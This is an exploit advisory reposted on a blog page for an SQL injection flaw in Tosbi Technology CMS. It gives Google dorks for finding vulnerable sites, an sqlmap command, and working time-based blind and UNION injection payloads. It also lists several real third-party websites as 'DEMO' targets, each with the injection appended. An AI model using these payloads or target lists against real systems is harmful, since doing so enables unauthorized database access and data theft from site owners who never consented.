Tosbi Technology CMS - SQL Injection Vulnerability


=========================================================

[+] Title                 :- Tosbi Technology CMS - SQL Injection Vulnerability 

[+] Date                  :- 27 - June - 2015

[+] Vendor Homepage       :- http://www.tosbitechnology.com/

[+] Version               :- All Versions

[+] Tested on             :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows

[+] Category              :- webapps

[+] Google Dorks          :- "Developed by Tosbi Technology"

                             "Developed by Tosbi Technology" inurl:"php?id="

                             "Developed by Tosbi Technology" +inurl:/.php?id=                      

[+] Exploit Author        :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)

[+] Team name             :- Team Alastor Breeze, Intelligent-Exploit

[+] Official Website      :- intelligentexploit.com

[+] The official Members  :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k

[+] Greedz to             :- @@lu, Lalit, MyLappy<3, Diksha, DK

[+] Contact               :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com





=========================================================

[+] Severity Level          :- High



[+] Request Method(s)       :- GET / POST



[+] Vulnerable Parameter(s) :- id



[+] Affected Area(s)        :- Entire admin, database, Server



[+] About                   :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error



[+] SQL vulnerable File     :- home/DOMAIN/public_html/index.php



[+] POC                     :- http://127.0.0.1/index.php?id=[SQL]'



The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.



SQLMap

++++++++++++++++++++++++++

python sqlmap.py --url "http://127.0.0.1/index.php?id=[SQL]" --dbs

++++++++++++++++++++++++++

---

---

Parameter: id (GET)

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

    Payload: id=915' AND (SELECT * FROM (SELECT(SLEEP(5)))uMzf) AND 'YEbn'='YEbn



    Type: UNION query

    Title: Generic UNION query (NULL) - 11 columns

    Payload: id=-5657' UNION ALL SELECT NULL,CONCAT(0x7171787171,0x4141464957556e754955,0x7176707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

---





[+] DEMO :-   http://www.mayaradio.tosbitechnology.com/play-media.php?id=915%27

              http://www.self-letting.com/read-news.php?id=26%27

              http://www.myiyanga.com/view-post.php?id=93%27 

              http://kayfoundationafrica.org/view-news.php?id=1%27



=======================================================
Tosbi Technology CMS - SQL Injection Vulnerability Tosbi Technology CMS - SQL Injection Vulnerability Reviewed by Izza009 on 17.23 Rating: 5

Tidak ada komentar:

Diberdayakan oleh Blogger.